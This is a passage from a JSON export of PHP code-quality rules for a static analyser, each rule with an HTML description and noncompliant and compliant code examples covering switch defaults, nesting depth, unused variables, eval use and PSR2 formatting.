<\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S131","repo":"php","name":"Statements should end with a \"case default\" clause","htmlDesc":"<p>The requirement for a final <code>case default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain\na suitable comment as to why no action is taken. Even when the <code>switch<\/code> covers all current values of an <code>enum<\/code>, a default case\nshould still be used because there is no guarantee that the <code>enum<\/code> won't be extended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($param) { \/\/missing default clause\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n}\n\nswitch ($param) {\n default: \/\/ default clause should be the last one\n error();\n break;\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($param) {\n case 0:\n do_something();\n break;\n case 1:\n do_something_else();\n break;\n default:\n error();\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S134","repo":"php","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements is a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n if (condition1) { \/\/ Compliant - depth = 1\n ...\n if (condition2) { \/\/ Compliant - depth = 2\n ...\n for($ = 0; $i < 10; $i++) { \/\/ Compliant - depth = 3, not exceeding the limit\n ...\n if (condition4) { \/\/ Non-Compliant - depth = 4\n if (condition5) { \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n ...\n }\n return;\n }\n }\n }\n }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed control flow statement nesting depth.","defaultValue":"4","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S138","repo":"php","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"150","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S139","repo":"php","name":"Comments should not be located at the end of lines of code","htmlDesc":"<p>This rule verifies that single-line comments are not located at the ends of lines of code. The main idea behind this rule is that in order to be\nreally readable, trailing comments would have to be properly written and formatted (correct alignment, no interference with the visual structure of\nthe code, not too long to be visible) but most often, automatic code formatters would not handle this correctly: the code would end up less readable.\nComments are far better placed on the previous empty line of code, where they will always be visible and properly formatted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a = $b + $c; \/\/ This is a trailing comment that can be very very long\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ This very long comment is better placed before the line of code\n$a = $b + $c;\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"legalTrailingCommentPattern","htmlDesc":"Pattern for text of trailing comments that are allowed. By default, comments containing only one word.","defaultValue":"^(\/\/|#)\\s*+[^\\s]++$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1479","repo":"php","name":"\"switch\" statements should not have too many \"case\" clauses","htmlDesc":"<p>When <code>switch<\/code> statements have large sets of <code>case<\/code> clauses, it is usually an attempt to map two sets of data. A real map\nstructure would be more readable and maintainable, and should be used instead.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of case","defaultValue":"30","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1481","repo":"php","name":"Unused local variables should be removed","htmlDesc":"<p>If a local variable is declared but not used, it is dead code and should be removed. Doing so will improve maintainability because developers will\nnot wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n $seconds = 0; \/\/ seconds is never used\n return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n return hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1488","repo":"php","name":"Local Variables should not be declared and then immediately returned or thrown","htmlDesc":"<p>Declaring a variable only to immediately return or throw it is a bad practice.<\/p>\n<p>Some developers argue that the practice improves code readability, because it enables them to explicitly name what is being returned. However, this\nvariable is an internal implementation detail that is not exposed to the callers of the method. The method name should be sufficient for callers to\nknow exactly what will be returned.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n $duration = ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000 ;\n return $duration;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds() {\n return ((($hours * 60) + $minutes) * 60 + $seconds ) * 1000;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1523","repo":"php","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. <\/p>\n<p>According to the PHP documentation<\/p>\n<blockquote>\n <p>The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have\n carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it\n without properly validating it beforehand.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval($code_to_be_dynamically_executed)\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n Evaluated Code ('Eval Injection') <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S1536","repo":"php","name":"Function argument names should be unique","htmlDesc":"<p>Function arguments should all have different names to prevent any ambiguity. Indeed, if arguments have the same name, the last duplicated argument\nhides all the previous arguments with the same name. This hiding makes no sense, reduces understandability and maintainability, and obviously can be\nerror prone. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute($a, $a, $c) { \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute($a, $b, $c) { \/\/ Compliant\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1599","repo":"php","name":"Variable variables should not be used","htmlDesc":"<p>PHP's \"variable variables\" feature (dynamically-named variables) is temptingly powerful, but can lead to unmaintainable code. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$var = 'foo';\n$$var = 'bar'; \/\/Noncompliant\n$$$var = 'hello'; \/\/Noncompliant\n\necho $foo; \/\/will display 'bar'\necho $bar; \/\/will display 'hello'\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1600","repo":"php","name":"Deprecated predefined variables should not be used","htmlDesc":"<p>The following predefined variables are deprecated and should be replaced by the new versions:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Replace<\/th>\n <th>With<\/th>\n <\/tr>\n <tr>\n <td>$HTTP_SERVER_VARS<\/td>\n <td>$_SERVER<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_GET_VARS<\/td>\n <td>$_GET<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_POST_VARS<\/td>\n <td>$_POST<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_POST_FILES<\/td>\n <td>$_FILES<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_SESSION_VARS<\/td>\n <td>$_SESSION<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_ENV_VARS<\/td>\n <td>$_ENV<\/td>\n <\/tr>\n <tr>\n <td>$HTTP_COOKIE_VARS<\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho 'Name parameter value: ' . $HTTP_GET_VARS[\"name\"];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho 'Name parameter value: ' . $_GET[\"name\"];\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1603","repo":"php","name":"PHP 4 constructor declarations should not be used","htmlDesc":"<p>In PHP 4, any function with the same name as the nesting class was considered a class constructor. In PHP 5, this mechanism has been deprecated and\nthe \"__construct\" method name should be used instead. If both styles are present in the same class, PHP 5 will treat the function named \"__construct\"\nas the class constructor. <\/p>\n<p>This rule rule raises an issue for each method with the same name as the enclosing class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n function Foo(){...}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n function __construct(){...}\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1605","repo":"php","name":"\"__construct\" functions should not make PHP 4-style calls to parent constructors","htmlDesc":"<p>In PHP 5 both the way to declare a constructor and the way to make a call to a parent constructor have evolved. When declaring constructors with\nthe PHP5 <code>__construct<\/code> name, nested calls to parent constructors should also use the new <code>__constructor<\/code> name.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo extends Bar {\n function __construct() {\n parent::Bar();\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo extends Bar {\n function __construct() {\n parent::__construct();\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1656","repo":"php","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic function setName($name) {\n $name = $name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function setName($name) {\n $this->name = $name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1757","repo":"php","name":"\"<?php\" and \"<?=\" tags should be used","htmlDesc":"<p>Coding conventions allow teams to collaborate effectively. For maximum standardization and readability, PHP code should use the long <code><?php\n?><\/code> tags or the short-echo <code><?= ?><\/code> tags; it should not use the other tag variations.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?\n$foo = 1;\n?>\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n$foo = 1;\n?>\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1763","repo":"php","name":"Jump statements should not be followed by other statements","htmlDesc":"<p>Jump statements (<code>return<\/code>, <code>break<\/code>, <code>continue<\/code>, and <code>goto<\/code>) and <code>throw<\/code> expressions move\ncontrol flow out of the current code block. Typically, any statements in a block that come after a jump or <code>throw<\/code> are simply wasted\nkeystrokes lying in wait to confuse the unwary. <\/p>\n<p>Rarely, as illustrated below, code after a jump or <code>throw<\/code> is reachable. However, such code is difficult to understand, and should be\nrefactored. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction fun($a) {\n $i = 10;\n return $i + $a;\n $i++; \/\/ this is never executed\n}\n\nfunction foo($a) {\n if ($a == 5) {\n goto error;\n } else {\n \/\/ do the job\n }\n return;\n\n error:\n printf(\"don't use 5\"); \/\/ this is reachable but unreadable\n\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction fun($a) {\n $i = 10;\n return $i + $a;\n}\n\nfunction foo($a) {\n if ($a == 5) {\n handleError();\n } else {\n \/\/ do the job\n }\n return;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 0-1-9 - There shall be no dead code <\/li>\n <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/561.html\">MITRE, CWE-561<\/a> - Dead Code <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1764","repo":"php","name":"Identical expressions should not be used on both sides of a binary operator","htmlDesc":"<p>Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy\/paste\nerror and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical\noperators, having the same value on both sides of an operator yields predictable results, and should be simplified.<\/p>\n<p>This rule ignores <code>*<\/code>, <code>+<\/code>, and <code>=<\/code>. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ( $a == $a ) { \/\/ always true\n doZ();\n}\nif ( $a != $a ) { \/\/ always false\n doY();\n}\nif ( $a == $b && $a == $b ) { \/\/ if the first one is true, the second one is too\n doX();\n}\nif ( $a == $b || $a == $b ) { \/\/ if the first one is true, the second one is too\n doW();\n}\n\n$j = 5 \/ 5; \/\/always 1\n$k = 5 - 5; \/\/always 0\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Left-shifting 1 onto 1 is common in the construction of bit masks, and is ignored.<\/p>\n<pre>\n$i = 1 << 1; \/\/ Compliant\n$j = $a << $a; \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> <a href='\/coding_rules#rule_key=php%3AS1656'>S1656<\/a> - Implements a check on <code>=<\/code>. <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1765","repo":"php","name":"The \"var\" keyword should not be used","htmlDesc":"<p>The PHP 4 method of declaring a variable, using the <code>var<\/code> keyword, was deprecated in early versions of PHP 5. Even though it's not\nconsidered deprecated in the most recent versions, it's nonetheless not best practice to use it. When <code>var<\/code> does appear, it is interpreted\nas a synonym for <code>public<\/code> and treated as such. Therefore <code>public<\/code> should be used instead.<\/p>\n<p>From the PHP Manual:<\/p>\n<blockquote>\n <p>The PHP 4 method of declaring a variable with the var keyword is still supported for compatibility reasons (as a synonym for the public keyword).\n In PHP 5 before 5.1.3, its usage would generate an E_STRICT warning.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\nclass Foo\n{\n var $bar = 1;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass Foo\n{\n public $bar = 1;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1766","repo":"php","name":"More than one property should not be declared per statement","htmlDesc":"<p>For better readability, do not put multiple property declarations in the same statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\nclass Foo\n{\n private $bar = 1, $bar2 = 2;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\nclass Foo\n{\n private $bar1 = 1;\n private $bar2 = 2;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1779","repo":"php","name":"Only LF character (Unix-like) should be used to end lines","htmlDesc":"<p>All developers should use the same end-line character(s) to prevent polluting the history changelog of source files in the SCM engine. Moreover\nsome SCM engines like Git might sometimes badly support use of Windows 'CRLF' end of line characters.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1780","repo":"php","name":"Closing tag \"?>\" should be omitted on files containing only PHP","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n <p>The closing <code>?><\/code> tag should be omitted from files containing only PHP.<\/p>\n<\/blockquote>\n<p>According to the PHP manual:<\/p>\n<blockquote>\n <p>in some cases omitting it is helpful when using include or require, so unwanted whitespace will not occur at the end of files, and you will still\n be able to add headers to the response later. It is also handy if you use output buffering, and would not like to see added unwanted whitespace at\n the end of the parts generated by the included files.<\/p>\n<\/blockquote>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1781","repo":"php","name":"PHP keywords and constants \"true\", \"false\", \"null\" should be lower case","htmlDesc":"<p>Using indifferently lower or upper case for PHP keywords and constants \"true\", \"false\" and \"null\" can impact the readability of PHP source\ncode.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php ECHO 'Hello World'; ?>\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php echo 'Hello World'; ?>\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1784","repo":"php","name":"Method visibility should be explicitly declared","htmlDesc":"<p>Class methods may be defined as public, private, or protected. Methods declared without any explicit visibility keyword are defined as public. To\nprevent any misunderstanding, this visibility should always be explicitly declared.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function foo(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1788","repo":"php","name":"Method arguments with default values should be last","htmlDesc":"<p>The ability to define default values for method arguments can make a method easier to use. Default argument values allow callers to specify as many\nor as few arguments as they want while getting the same functionality and minimizing boilerplate, wrapper code. <\/p>\n<p>But all method arguments with default values should be declared after the method arguments without default values. Otherwise, it makes it\nimpossible for callers to take advantage of defaults; they must re-specify the defaulted values in order to \"get to\" the non-default arguments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction makeyogurt($type = \"acidophilus\", $flavor){...} \/\/ Noncompliant\n\nmakeyogurt(\"raspberry\")}} \/\/ Runtime error: Missing argument 2 in call to makeyogurt()\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction makeyogurt($flavor, $type = \"acidophilus\", ){...}\n\nmakeyogurt(\"raspberry\")}} \/\/ Works as expected\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1793","repo":"php","name":"\"elseif\" keyword should be used in place of \"else if\" keywords","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n <p>The keyword <code>elseif<\/code> SHOULD be used instead of <code>else if<\/code> so that all control keywords look like single words.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($expr1) {\n ...\n} else if ($expr2) {\n ...\n} else {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($expr1) {\n ...\n} elseif ($expr2) {\n ...\n} else {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1799","repo":"php","name":"\"exit(...)\" and \"die(...)\" statements should not be used","htmlDesc":"<p>The <code>exit(...)<\/code> and <code>die(...)<\/code> statements should absolutely not be used in Web PHP pages as this might lead to a very bad\nuser experience. In such case, the end user might have the feeling that the web site is down or has encountered a fatal error. <\/p>\n<p>But of course PHP can also be used to develop command line application and in such case use of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatement can be justified but must remain limited and not spread all over the application. We expect exceptions to be used to handle errors and those\nexceptions should be caught just before leaving the application to specify the exit code with help of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n public function bar($param) {\n if ($param === 42) {\n exit(23);\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n public function bar($param) {\n if ($param === 42) {\n throw new Exception('Value 42 is not expected.');\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1808","repo":"php","name":"Source code should comply with formatting standards","htmlDesc":"<p>Shared coding conventions make it possible for a team to collaborate efficiently. This rule raises issues for failures to comply with formatting\nstandard. The default parameter values conform to the PSR2 standard.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default PSR2 parameter values:<\/p>\n<pre>\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"use\" declaration should be placed after the \"namespace\" declaration\n\nnamespace Vendor\\Package;\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"namespace\" declaration should be followed by a blank line\n$foo = 1;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \/\/ Noncompliant; the \"use\" declaration should be followed by a blank line\n\nclass ClassA {\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002 \u2002\/\/ Noncompliant; an open curly brace should be at the beginning of a new line for classes and functions\n\u2002\u2002function my_function(){ \u2002\/\/ Noncompliant; curly brace on wrong line\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002\u2002\u2002\u2002\u2002\u2002\u2002\/\/ Noncompliant; an open curly brace should be at the end of line for a control structure\n\u2002\u2002\u2002\u2002{\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002 {\u2002\/\/ Noncompliant; there should be exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n if($thirdThing) { \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the opening parenthesis\n ...\n }\n else { \/\/ Noncompliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword should be located on the same line\n ...\n }\n\n try{ \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the curly brace\n ...\n } catch (Exception $e) {\n\u2002\u2002 }\n\n analyse( $fruit ) ; \/\/ Noncompliant; there should not be any space after the opening parenthesis and before the closing parenthesis\n\n for ($i = 0;$i < 10; $i++) { \/\/ Nomcompliant; there should be exactly one space after each \";\" in the {{for}} statement\n ...\n }\n\n pressJuice($apply ,$orange); \/\/ Noncompliant; the comma should be followed by one space and not preceded by any\n\n do_something (); \/\/ Noncompliant; there should not be any space after the method name\n\n foreach ($fruits as $fruit_key => $fruit) { \/\/ Noncompliant; in the foreach statement there should be one space before and after \"as\" keyword and \"=>\" operator\n ...\n }\n }\n}\n\nclass ClassB\nextends ParentClass \/\/ Noncompliant; the class name and the \"extends\" \/ \"implements\" keyword should be on the same line\n{\n ...\n}\n\nclass ClassC extends ParentClass implements \\ArrayAccess, \\Countable,\n \\Serializable \/\/ Noncompliant; the list of implemented interfaces should be correctly indented\n{\n\n public function aVeryLongMethodName(ClassTypeHint $arg1, \/\/ Noncompliant; the arguments in a method declaration should be correctly indented\n &$arg2, array $arg3 = []) {\n\n $noArgs_longVars = function () use ($longVar1, \/\/ Noncompliant; the arguments in a function declaration should be correctly indented\n $longerVar2,\n $muchLongerVar3\n ) {\n ...\n };\n\n $foo->bar($longArgument, \/\/ Noncompliant; the arguments in a method call should be correctly indented\n $longerArgument,\n $muchLongerArgument); \/\/ Noncompliant; the closing parenthesis should be placed on the next line\n\n $closureWithArgsAndVars = function($arg1, $arg2)use ($var1, $var2) { \/\/ Noncompliant; the closure declaration should be correctly spaced - see (5)\n ...\n };\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nnamespace Vendor\\Package; \/\/ Compliant; the \"namespace\" declaration is followed by a blank line\n\nuse FooClass; \/\/ Compliant; the \"use\" declaration is placed after the \"namespace\" declaration\n \/\/ Compliant; the \"use\" declaration is followed by a blank line\n$foo = 1;\n\nclass ClassA\n{\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002\/\/ Compliant; the open curly brace is at the beginning of a new line for the class\n\u2002\u2002function my_function()\n {\u2002\u2002\u2002\u2002 \/\/ Compliant; the open curly brace is at the beginning of a new line for the function\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002{\u2002\u2002\u2002\u2002\/\/ Compliant; the open curly brace is at the end of line for the control structure\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002{\u2002\u2002 \/\/ Compliant; there is exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n if ($thirdThing) { \/\/ Compliant; there is exactly one space between the control structure keyword and the opening parenthesis\n ...\n } else { \/\/ Compliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword are located on the same line\n ...\n }\n\n try { \/\/ Compliant; there is exactly one space between the control structure keyword and the curly brace\n ...\n } catch (Exception $e) {\n ...\n }\n\n analyse($fruit); \/\/ Compliant: there is no space after the opening parenthesis, nor before the closing parenthesis\n\n for ($i = 0; $i < 10; $i++) { \/\/ Compliant: there is exactly one space after each \";\" in the {{for}} statement\n ...\n }\n\n pressJuice($apply, $orange); \/\/ Compliant; the comma is followed by one space and is not preceded by any\n\n do_something(); \/\/ Compliant; there is no space after the method name\n\n foreach ($fruits as $fruit_key => $fruit) { \/\/ Compliant; in the foreach statement there is one space before and after \"as\" keyword and \"=>\" operator\n ...\n }\n }\n}\n\n\/* The idea here is to make it obvious at first glance that a class extends\n * some other classes and\/or implements some interfaces. The names of\n * extended classes or implemented interfaces can be located on subsequent lines.\n *\/\nclass ClassB1 extends ParentClass \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\n{\n ...\n}\n\nclass ClassB2 extends \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\nParentClass {\n ...\n}\n\n\/* Lists of implements may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one interface per line.\n *\/\nclass ClassC extends ParentClass implements\n \\ArrayAccess, \/\/ Compliant; the list of implemented interfaces is correctly indented\n \\Countable,\n \\Serializable\n{\n \/* Argument lists may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one argument per line. Also, when the argument list is\n * split across multiple lines, the closing parenthesis and opening brace should be\n * placed together on their own line with one space between them.\n *\/\n public function aVeryLongMethodName(\n ClassTypeHint $arg1, \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n &$arg2,\n array $arg3 = []\n ) {\n $noArgs_longVars = function () use (\n $longVar1, \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n $longerVar2,\n $muchLongerVar3\n ) {\n ...\n };\n\n\n \/* Argument lists may be split across multiple lines, where each subsequent line is\n * indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one argument per line.\n 